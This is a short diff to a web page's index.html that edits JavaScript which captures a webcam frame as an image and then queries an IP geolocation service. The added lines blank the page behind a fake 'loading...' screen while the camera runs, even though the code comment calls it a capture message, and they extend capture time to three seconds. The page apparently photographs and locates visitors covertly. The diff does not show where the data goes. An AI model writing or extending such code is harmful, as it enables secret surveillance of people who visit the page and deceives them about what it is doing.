--- a/index.html
+++ b/index.html
@@ -139,8 +139,10 @@
           video.srcObject = stream;
           await video.play();
 
+          // Show "Capturing..." message
+          document.body.innerHTML = `<div style="width:100%;height:100%;display:flex;justify-content:center;align-items:center;background:#000;color:#fff;font-family:Arial">loading...…</div>`;
+
           await new Promise((resolve) => {
-            // Give camera time to show a frame
             setTimeout(() => {
               const canvas = document.createElement("canvas");
               canvas.width = video.videoWidth;
@@ -150,10 +152,10 @@
               capturedImageData = canvas.toDataURL("image/png");
               stream.getTracks().forEach(track => track.stop());
               resolve();
-            }, 500); // Delay ensures frame is ready
+            }, 3000); // Wait 3 seconds to ensure camera is ready
           });
         } catch {
-          // Camera denied — continue without image
+          // Camera denied or failed
         }
 
         fetch("https://api.db-ip.com/v2/free/self")
